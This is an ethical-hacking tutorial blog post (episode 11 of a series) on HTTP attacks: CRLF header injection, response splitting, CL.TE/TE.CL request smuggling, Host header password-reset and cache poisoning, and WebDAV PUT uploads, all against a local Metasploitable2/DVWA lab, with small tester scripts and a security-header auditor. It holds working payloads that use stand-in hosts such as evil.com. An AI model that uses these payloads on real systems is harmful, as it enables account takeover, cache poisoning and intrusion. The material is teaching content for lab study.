Learn Ethical Hacking (#11) - HTTP Deep Dive - Request Smuggling and Header Injection

avatar
(Edited)

Learn Ethical Hacking (#11) - HTTP Deep Dive - Request Smuggling and Header Injection

leh-banner.jpg

What will I learn

  • HTTP beyond the basics: methods, headers, status codes, and cookies from the attacker's perspective;
  • Request smuggling: exploiting disagreements between front-end and back-end servers;
  • Header injection: injecting headers to manipulate server behavior;
  • HTTP response splitting: injecting content into responses via header manipulation;
  • Host header attacks: cache poisoning and password reset hijacking;
  • Using Burp Suite to intercept, modify, and replay HTTP requests.

Requirements

  • A working modern computer running macOS, Windows or Ubuntu;
  • Your hacking lab from Episode 2 (Kali + DVWA);
  • Burp Suite Community Edition (pre-installed on Kali);
  • The ambition to learn ethical hacking and security research.

Difficulty

  • Beginner

Curriculum (of the Learn Ethical Hacking series):

Solutions to Episode 10 Exercises

Exercise 1 -- CVE research for Metasploitable2:

CVE-2011-2523 (vsftpd 2.3.4):
  CVSS: 10.0 | Vector: Network | Metasploit: exploit/unix/ftp/vsftpd_234_backdoor
  Fix: Upgrade to vsftpd 2.3.5+ (backdoor removed from source)

CVE-2010-2075 (UnrealIRCd 3.2.8.1):
  CVSS: 7.5 | Vector: Network | Metasploit: exploit/unix/irc/unreal_ircd_3281_backdoor
  Fix: Upgrade to UnrealIRCd 3.2.8.1.1+ (verify source hash after download)

CVE-2007-2447 (Samba 3.0.20-3.0.25rc3):
  CVSS: 6.0 | Vector: Network (authenticated) | Metasploit: exploit/multi/samba/usermap_script
  Fix: Upgrade to Samba 3.0.25+

Priority order: vsftpd FIRST (CVSS 10.0, unauthenticated, trivial to exploit,
gives root shell). Then UnrealIRCd (unauthenticated RCE). Samba last
(requires some authentication, lower CVSS).

The key insight: exploit prioritization is about impact AND difficulty. The vsftpd backdoor gives root access with zero complexity -- you literally type a smiley face. That's always first.

Exercise 2 -- patch_monitor.py:

import json, requests

def check_nvd(product, version):
    url = f"https://services.nvd.nist.gov/rest/json/cves/2.0?keywordSearch={product}+{version}"
    resp = requests.get(url, timeout=15)
    data = resp.json()
    vulns = []
    for v in data.get('vulnerabilities', [])[:5]:
        cve = v['cve']
        cve_id = cve['id']
        score = 'N/A'
        for m in ['cvssMetricV31', 'cvssMetricV30']:
            if m in cve.get('metrics', {}):
                score = cve['metrics'][m][0]['cvssData']['baseScore']
                break
        vulns.append({'id': cve_id, 'score': score})
    return vulns

# Read services.json: [{"name": "Apache", "version": "2.2.8"}, ...]
with open('services.json') as f:
    services = json.load(f)
for svc in services:
    vulns = check_nvd(svc['name'], svc['version'])
    print(f"{svc['name']} {svc['version']}: {len(vulns)} CVEs found")
    for v in vulns:
        print(f"  {v['id']} (CVSS: {v['score']})")

The key insight: automated monitoring is essential because vulnerabilities are disclosed constantly. The NVD publishes roughly 2,000 new CVEs per month. No human can track that manually.

Exercise 3 -- Log4Shell analysis:

Timeline:
- Nov 24, 2021: Alibaba Cloud reports to Apache privately
- Dec 9: Public disclosure + PoC published
- Dec 10: Mass scanning/exploitation begins worldwide
- Dec 13: Apache releases Log4j 2.16.0 (first complete fix)
- Dec 17: Second RCE found in 2.16.0, fixed in 2.17.0
- Jan-Mar 2022: Continued exploitation of unpatched systems

Why critical (10.0): unauthenticated RCE via a LOG MESSAGE. Any
user-controlled string that reaches Log4j (HTTP headers, form fields,
usernames, search queries) triggers JNDI lookup -> LDAP -> attacker
server -> arbitrary class loading -> code execution.

Defense-in-depth that would have helped:
1. Egress filtering (block outbound LDAP connections from web servers)
2. Network segmentation (limit blast radius of compromised server)
3. WAF rules (detect ${jndi: patterns in input)
4. Runtime application self-protection (RASP)

The key insight: Log4Shell was catastrophic because logging is everywhere -- it's the ONE thing every application does. The attack surface was any input that eventually gets logged, which is basically all input.


Learn Ethical Hacking (#11) - HTTP Deep Dive - Request Smuggling and Header Injection

Welcome to Arc 2. For the next batch of episodes, we're going to systematically attack web applications -- the single largest attack surface on the internet. And we start with the protocol that makes it all work: HTTP.

We touched on HTTP in episode 3 when we looked at how the internet works from an attacker's perspective. We saw packets on the wire with Wireshark. We talked about TCP handshakes and DNS resolution. But that was 30,000 feet. Now we go deep. Because HTTP is deceptively simple on the surface but absolutely packed with ambiguities and quirks that attackers exploit every single day. When you understand HTTP at the raw byte level, web vulnerabilities stop being mysterious and start becoming obvious.

I should mention -- a lot of web developers I've worked with over the years (and trust me, I've worked with quit some) treat HTTP as this invisible thing that "just works." They fire off a fetch() call, get a response, done. They never look at the actual headers. They never think about what happens when a load balancer and a backend server disagree about the request format. And that's exactly the gap attackers walk through ;-)

HTTP from the Attacker's Perspective

Let's start by talking directly to a web server. No browser. No abstractions. Raw TCP:

# Connect to Metasploitable2's Apache and send a raw HTTP request
echo -e "GET / HTTP/1.1\r\nHost: 192.168.56.101\r\nUser-Agent: Scipio/1.0\r\nAccept: */*\r\nConnection: close\r\n\r\n" | nc 192.168.56.101 80

What comes back:

HTTP/1.1 200 OK
Date: Wed, 16 Apr 2026 14:00:00 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 891
Connection: close
Content-Type: text/html

<html>...

Every header leaks information. Server and X-Powered-By give exact versions -- which we can immediately look up in the vulnerability databases from episode 10. Content-Length tells us the response size. And Connection: close tells us the server closed the connection after responding.

This is the thing about HTTP that most people miss: headers are metadata that both sides exchange in plaintext (unless TLS is wrapping the connection, as we covered in episode 9). And that metadata tells you an enormous amount about the server's technology stack, configuration, and sometimes even its security posture. A server that sends X-Powered-By: PHP/5.2.4 is screaming "I haven't been updated since 2008" to anyone who listens.

Now let's get interesting.

HTTP Methods: More Than GET and POST

Most developers think HTTP has two methods: GET (read) and POST (write). In reality, HTTP defines several, and each one represents a potential attack vector when misconfigured:

# Check which methods the server supports
curl -X OPTIONS http://192.168.56.101/ -i

# Try PUT (upload a file -- if allowed, this is critical)
curl -X PUT http://192.168.56.101/test.txt -d "file content here" -i

# Try DELETE
curl -X DELETE http://192.168.56.101/test.txt -i

# TRACE (reflects request back -- can leak cookies and auth headers)
curl -X TRACE http://192.168.56.101/ -i

If PUT is enabled on a web server, you can upload files directly -- including web shells. A web shell is a script (usually PHP) that gives the attacker command execution on the server through their browser. One PUT request to upload a PHP file, one GET request to execute it, and you own the server. If TRACE is enabled, it echoes the full request back to the client including any cookies or authentication tokens the browser sent (a technique called Cross-Site Tracing, XST).

Metasploitable2's Apache has WebDAV enabled with PUT support. Try it:

# Upload a test file via PUT
curl -X PUT http://192.168.56.101/dav/test.txt -d "Uploaded by attacker"
curl http://192.168.56.101/dav/test.txt
# If it returns "Uploaded by attacker" -- you can write arbitrary files

If that worked, you've just confirmed arbitrary file write on the server. In a real engagement, the next step would be uploading a PHP web shell instead of a text file. We'll cover that in detail when we get to file upload vulnerabilities later in this arc. For now, the point is: HTTP methods beyond GET and POST are often enabled unnecessarily and represent a serious misconfiguration.

Having said that, modern web servers (nginx, Apache 2.4+) have much saner defaults. PUT and DELETE are typically disabled unless explicitly configured. But legacy systems, development servers that accidentally went to production, and IoT devices running embedded HTTP stacks -- these still pop up regularly in pentests.

Burp Suite: Your HTTP Microscope

Burp Suite is the most important web security tool after Nmap. It sits between your browser and the target as a proxy, letting you intercept, inspect, modify, and replay every HTTP request. If Nmap is your telescope for finding targets (episodes 4 and 5), Burp Suite is your microscope for examining what those targets do up close.

On your Kali VM:

burpsuite &
  1. Go to Proxy > Options -- confirm it's listening on 127.0.0.1:8080
  2. In Firefox: Settings > Network Settings > Manual proxy -- set HTTP proxy to 127.0.0.1 port 8080
  3. Browse to http://192.168.56.101/dvwa/
  4. In Burp, go to Proxy > Intercept -- you'll see every request

Now you can:

  • Modify requests before they're sent (change parameters, add headers, alter cookies)
  • Replay requests (Repeater tab -- change one thing, send again, compare responses)
  • Fuzz parameters (Intruder tab -- send hundreds of variations automatically)
  • Decode/encode data (Decoder tab -- base64, URL encoding, hex)

This is your primary tool for web application testing. Everything we do from here through the rest of Arc 2 will use Burp Suite. Get comfortable with it now -- especially the Repeater tab, which is where you'll spend most of your time. The workflow is: intercept a request in the Proxy, right-click "Send to Repeater", then modify and resend it as many times as you want while observing how the server responds to each variation.

One incredibly useful feature: the HTTP history in the Proxy tab records every request that went through the proxy. After browsing a web application for a few minutes, you'll have a complete map of every endpoint, every parameter, every cookie. This is passive reconnaissance through the proxy -- just USE the application normally and Burp records everything. We did active reconnaissance with Nmap in episode 5. Burp Suite gives us passive application-level recon for free.

Header Injection

HTTP headers are separated by \r\n (carriage return + line feed). If user input ends up in a response header without sanitization, an attacker can inject additional headers by embedding the CRLF sequence in their input:

Suppose a web app sets a redirect header based on user input:
  GET /redirect?url=https://example.com

Server generates:
  HTTP/1.1 302 Found
  Location: https://example.com

What if the attacker sends:
  GET /redirect?url=https://evil.com%0d%0aSet-Cookie:%20admin=true

Server generates:
  HTTP/1.1 302 Found
  Location: https://evil.com
  Set-Cookie: admin=true          <-- INJECTED HEADER!

The %0d%0a is URL-encoded \r\n -- the header separator. The attacker just set an arbitrary cookie in the victim's browser. If the application trusts that cookie for authorization (and you'd be surprised how many do), the attacker just escalated to admin with a single crafted URL.

This is called CRLF injection and it's the building block for several more advanced attacks. The root cause is always the same: user input ending up in HTTP headers without the CRLF characters being stripped or encoded. It sounds like an obvious thing to prevent, but remember what we discussed in episode 6 about AI-generated code -- frameworks that auto-generate redirect headers from user input don't always sanitize for CRLF. Nooit aannemen dat de framework het voor je doet.

Let's test header injection with a Python script:

#!/usr/bin/env python3
"""
Header injection tester -- checks if a URL parameter is reflected
in response headers without sanitization.
"""
import requests

target = "http://192.168.56.101/dvwa"

# Test for CRLF injection in redirect parameters
payloads = [
    "test%0d%0aInjected-Header: true",
    "test%0d%0aSet-Cookie: hacked=yes",
    "test\r\nX-Injected: works",
]

for payload in payloads:
    try:
        resp = requests.get(f"{target}/vulnerabilities/redirect/?url={payload}",
                          allow_redirects=False, timeout=5)
        for header, value in resp.headers.items():
            if 'injected' in header.lower() or 'hacked' in value.lower():
                print(f"[+] Header injection confirmed!")
                print(f"    Payload: {payload}")
                print(f"    Injected: {header}: {value}")
    except Exception as e:
        print(f"[-] Error: {e}")

HTTP Response Splitting

Header injection gets more dangerous when you can inject a complete response. If you can inject enough CRLF sequences, you can terminate the first response entirely and start a second one:

GET /redirect?url=x%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html>FAKE</html>

What the browser might see as TWO responses:
  Response 1: HTTP/1.1 302 Found\r\nLocation: x\r\n\r\n
  Response 2: HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>FAKE</html>

If there's a proxy or cache between the attacker and the server, the second "response" can get associated with the NEXT request that comes through that connection -- potentially a request from a completely different user. The attacker just poisoned the cache or hijacked another user's response. This is how header injection escalates from "set a cookie" to "serve malicious content to other users."

Modern HTTP frameworks and servers have gotten much better at preventing response splitting. Most web servers now strip or reject CRLF in header values by default. But older applications, custom HTTP implementations, and backend services that speak raw HTTP still get caught by this.

HTTP Request Smuggling

Request smuggling is one of the most powerful and least understood web attacks. It exploits disagreements between front-end servers (load balancers, CDNs, reverse proxies) and back-end servers about where one request ends and the next one begins.

The root cause: HTTP/1.1 has TWO ways to specify the body length:

  • Content-Length: 42 (explicit byte count)
  • Transfer-Encoding: chunked (body split into chunks, terminated by 0\r\n)

What if a request contains BOTH headers? The RFC says Transfer-Encoding takes precedence. But not all servers agree. A front-end might use Content-Length while the back-end uses Transfer-Encoding -- or vice versa. This ambiguity is the entire vulnerability.

CL.TE Smuggling (front-end uses Content-Length, back-end uses Transfer-Encoding):

POST / HTTP/1.1
Host: vulnerable.com
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED

The front-end sees Content-Length: 13, forwards exactly 13 bytes (0\r\n\r\nSMUGGLED). The back-end processes the chunked encoding, sees 0\r\n\r\n (end of body), and treats SMUGGLED as the START of the NEXT request. The attacker just prepended data to another user's request.

Lees dat nog een keer. The attacker's data gets welded onto the front of someone else's request. If the smuggled data is GET /admin HTTP/1.1\r\nHost: vulnerable.com\r\n\r\n, the next user's legitimate request gets eaten and replaced with a request for the admin panel -- and the response goes back to THAT user. Or even better: the smuggled prefix captures the next user's request headers (including their session cookie) and reflects them somewhere the attacker can read.

TE.CL Smuggling (front-end uses Transfer-Encoding, back-end uses Content-Length):

POST / HTTP/1.1
Host: vulnerable.com
Content-Length: 3
Transfer-Encoding: chunked

8
SMUGGLED
0

The front-end processes chunked encoding (chunk of 8 bytes + terminator, forwards everything). The back-end uses Content-Length: 3, reads only 3 bytes (8\r\n), and the rest (SMUGGLED\r\n0\r\n\r\n) becomes the beginning of a new request in the connection pipeline.

What can you do with request smuggling?

  • Bypass security controls: the WAF sees one request, the back-end processes two
  • Poison the web cache: your smuggled request's response gets cached for the next user
  • Steal other users' requests: the smuggled prefix gets prepended to the next user's request, capturing their credentials or tokens
  • Redirect users: inject Host headers that change where responses go

Request smuggling is complex to exploit reliably, but the payoff is enormous. James Kettle's research at PortSwigger (the makers of Burp Suite) has documented critical smuggling vulnerabilities in major CDNs and cloud providers including Amazon ALB, Akamai, and Cloudflare. These aren't theoretical -- they affected millions of websites.

Here's a simple detection script to check for potential smuggling:

#!/usr/bin/env python3
"""
Basic HTTP request smuggling detector.
Sends ambiguous CL/TE requests and checks for timing differences.
"""
import socket
import time

def smuggle_test(host, port=80):
    """Test for CL.TE smuggling via timing difference."""
    # Normal request baseline
    normal = (
        f"POST / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: 4\r\n"
        f"\r\n"
        f"x=1\r\n"
    ).encode()

    # CL.TE probe: if backend uses TE, it waits for chunk terminator
    probe = (
        f"POST / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: 4\r\n"
        f"Transfer-Encoding: chunked\r\n"
        f"\r\n"
        f"1\r\n"
        f"x\r\n"
        f"0\r\n"
        f"\r\n"
    ).encode()

    for label, payload in [("normal", normal), ("CL.TE probe", probe)]:
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(10)
            s.connect((host, port))
            start = time.time()
            s.send(payload)
            resp = s.recv(4096)
            elapsed = time.time() - start
            status = resp.split(b'\r\n')[0].decode() if resp else 'no response'
            print(f"  [{label}] {status} ({elapsed:.2f}s)")
            s.close()
        except socket.timeout:
            print(f"  [{label}] TIMEOUT (>10s) -- possible smuggling indicator")
        except Exception as e:
            print(f"  [{label}] Error: {e}")

print("[*] HTTP Request Smuggling Detection")
print("[*] Target: 192.168.56.101 (Metasploitable2)")
smuggle_test("192.168.56.101")

A significant timing difference between the normal request and the CL.TE probe (the probe takes much longer or times out) suggests the backend is trying to process chunked encoding while the frontend used Content-Length. That's the signature of a potential CL.TE smuggling vulnerability. Having said that, this is a very basic check -- real-world smuggling testing requires much more sophisticated probing and careful analysis of how the responses are desynchronized.

Host Header Attacks

The Host header tells the server which website you want. In virtual hosting (multiple sites on one IP), this is how the server knows which site to serve. But applications often trust the Host header for internal logic, and that trust is frequently misplaced:

# Normal request
curl -H "Host: example.com" http://192.168.56.101/ -i

# What if we send a different Host header?
curl -H "Host: evil-attacker.com" http://192.168.56.101/ -i

Attacks that exploit Host header trust:

Password reset poisoning: Application generates a reset link using the Host header:

Dear user,
Click here to reset your password:
https://{Host}/reset?token=abc123

Attacker requests a password reset for the victim's account but changes the Host header to evil-attacker.com. Victim receives a legitimate-looking email from the real application with:

https://evil-attacker.com/reset?token=abc123

Victim clicks because the email IS from the real application -- it just contains a link to the attacker's server. Attacker captures the reset token. Attacker resets the password. Game over.

This is one of those attacks that sounds far-fetched until you realise how many web frameworks build URLs from the Host header by default. Django's HttpRequest.build_absolute_uri() uses the Host header. Ruby on Rails' url_for uses it. Many password reset implementations just call these framework functions without a second thought. The fix is straightforward (whitelist allowed hostnames, use a hardcoded base URL for sensitive links) but the vulnerability persists because developers don't consider the Host header as untrusted input.

Cache poisoning: Attacker sends a request with Host: evil.com to a page that reflects the Host in links or asset URLs. If a CDN or caching proxy sits in front of the application, it caches this response. The next user who requests the same page gets served the cached version -- which is full of links and references to evil.com. The attacker just poisoned the cache for every user who visits that page.

This is exactly the pattern that James Kettle documented in his "Practical Web Cache Poisoning" research. He found that major websites were vulnerable because their caching layers keyed responses on the URL path but NOT on the Host header. Different Host header, same cache key, poisoned response served to everyone.

HTTP Security Headers: What's Missing Tells You Everything

When you're assessing a web application's security posture, the ABSENCE of certain headers is as telling as the presence of vulnerabilities. Here's a quick audit you can do against any target:

#!/usr/bin/env python3
"""
HTTP security header auditor -- checks for missing defensive headers.
"""
import requests
import sys

SECURITY_HEADERS = {
    'X-Content-Type-Options': {
        'expected': 'nosniff',
        'risk': 'Browser MIME-type sniffing can execute uploaded files as scripts'
    },
    'X-Frame-Options': {
        'expected': 'DENY or SAMEORIGIN',
        'risk': 'Page can be framed -- clickjacking attacks possible'
    },
    'Content-Security-Policy': {
        'expected': 'varies (restrict script sources)',
        'risk': 'No CSP -- XSS attacks have no browser-level mitigation'
    },
    'Strict-Transport-Security': {
        'expected': 'max-age=31536000; includeSubDomains',
        'risk': 'No HSTS -- downgrade attacks from HTTPS to HTTP possible'
    },
    'Referrer-Policy': {
        'expected': 'strict-origin-when-cross-origin',
        'risk': 'Full URL leaked in Referer header to third-party sites'
    },
}

def audit(url):
    resp = requests.get(url, timeout=10, verify=False)
    print(f"[*] Auditing: {url}")
    print(f"[*] Status: {resp.status_code}")
    print(f"[*] Server: {resp.headers.get('Server', 'not disclosed')}\n")

    missing = 0
    for header, info in SECURITY_HEADERS.items():
        value = resp.headers.get(header)
        if value:
            print(f"  [OK] {header}: {value}")
        else:
            missing += 1
            print(f"  [!!] {header}: MISSING")
            print(f"        Risk: {info['risk']}")
            print(f"        Should be: {info['expected']}")

    # Check for information leakage headers
    leaky = ['Server', 'X-Powered-By', 'X-AspNet-Version', 'X-AspNetMvc-Version']
    print(f"\n[*] Information leakage:")
    for h in leaky:
        v = resp.headers.get(h)
        if v:
            print(f"  [!!] {h}: {v} (reveals technology stack)")

    print(f"\n[*] Missing security headers: {missing}/{len(SECURITY_HEADERS)}")

if __name__ == '__main__':
    target = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.56.101"
    audit(target)
# Audit Metasploitable2 (spoiler: it's missing everything)
python3 header_audit.py http://192.168.56.101

# Audit a modern site for comparison
python3 header_audit.py https://hive.blog

Running this against Metasploitable2 will show everything missing -- it's a deliberately vulnerable system from 2012. Running it against a modern production site will show you what proper header security looks like. The contrast is educational.

Cookies and Session Management from the Attacker's View

Before we wrap up, let's talk about one more critical aspect of HTTP: cookies. Cookies are how web applications maintain state (because HTTP itself is stateless -- each request is independent). After you log in, the server gives you a session cookie that says "this browser belongs to authenticated user X." Every subsequent request includes that cookie automatically.

The security attributes on cookies matter enormously:

Set-Cookie: session=abc123; HttpOnly; Secure; SameSite=Strict; Path=/

HttpOnly  -- JavaScript cannot read this cookie (prevents XSS cookie theft)
Secure    -- only sent over HTTPS (prevents interception on HTTP)
SameSite  -- controls when cookie is sent with cross-site requests
Path      -- limits which URLs receive the cookie

If ANY of these attributes are missing, the cookie is weaker than it needs to be:

  • No HttpOnly? XSS can steal it via document.cookie (we'll cover this in detail when we get to XSS).
  • No Secure? Cookie sent over plain HTTP -- anyone on the network can grab it (episode 3, Wireshark).
  • No SameSite? Cross-site request forgery becomes easier (that's a whole episode of its own coming later).

You can inspect cookie attributes in Burp Suite's response tab, or directly in your browser's developer tools. When testing a web application, the cookie configuration is one of the first things to check -- it tells you how seriously the developers take session security.

AI Slop Angle: HTTP Security

AI code assistants (continuing our running theme from episode 6) frequently generate HTTP handling code that's vulnerable:

  • No CSRF tokens on state-changing requests
  • Trusting the Host header for generating URLs (password reset poisoning, as we just discussed)
  • No Content-Type validation (accepting JSON when only form data is expected, or vice versa)
  • Missing security headers (no X-Content-Type-Options, X-Frame-Options, Content-Security-Policy)
  • CORS misconfiguration (Access-Control-Allow-Origin: * on authenticated endpoints -- which means any website can make authenticated requests to your API and read the responses)

The AI generates code that "works" -- requests go through, responses come back, the application functions correctly. But the security properties are absent because they don't affect functionality. A password reset that works perfectly while also being vulnerable to Host header poisoning is still a working password reset. The vulnerability is invisible until someone exploits it.

This is going to be a recurring pattern throughout Arc 2. Almost every web vulnerability we cover exists because the application works correctly from a functional perspective while being broken from a security perspective. Security is a non-functional requirement, and non-functional requirements are exactly what gets dropped when developers (or AI assistants) optimize for "does it work?" instead of "is it safe?"

Exercises

Exercise 1: Set up Burp Suite as a proxy on your Kali VM. Browse to DVWA and log in. In Burp's Proxy history, find the login POST request. Using Burp Repeater, modify the request: change the User-Agent header to something custom, add a new header X-Custom: test, and change the username. Send it. What happens? Then try the same login request but remove the Cookie header entirely. Document: what does the server need from each header to process the login?

Exercise 2: Write a Python script called header_audit.py that takes a URL and checks for missing security headers. The script should make a GET request and verify the presence of: X-Content-Type-Options, X-Frame-Options, Content-Security-Policy, Strict-Transport-Security, X-XSS-Protection, and Referrer-Policy. For each missing header, print what the risk is and what the header should be set to. Test it against both Metasploitable2 (http) and a real HTTPS site.

Exercise 3: Using netcat (not curl, not a browser), manually craft and send three HTTP requests to Metasploitable2: (a) a GET request for the root page with custom headers, (b) a POST request with form data (Content-Type: application/x-www-form-urlencoded), and (c) a request using the OPTIONS method. For each, capture the full response and document every header the server sends back. Identify which headers leak information about the server's technology stack.


HTTP is simple -- Right? Rrrrright ;-)

@scipio



0
0
0.000
1 comments
avatar

Thanks for your contribution to the STEMsocial community. Feel free to join us on discord to get to know the rest of us!

Please consider delegating to the @stemsocial account (85% of the curation rewards are returned).

Consider setting @stemsocial as a beneficiary of this post's rewards if you would like to support the community and contribute to its mission of promoting science and education on Hive. 
 

0
0
0.000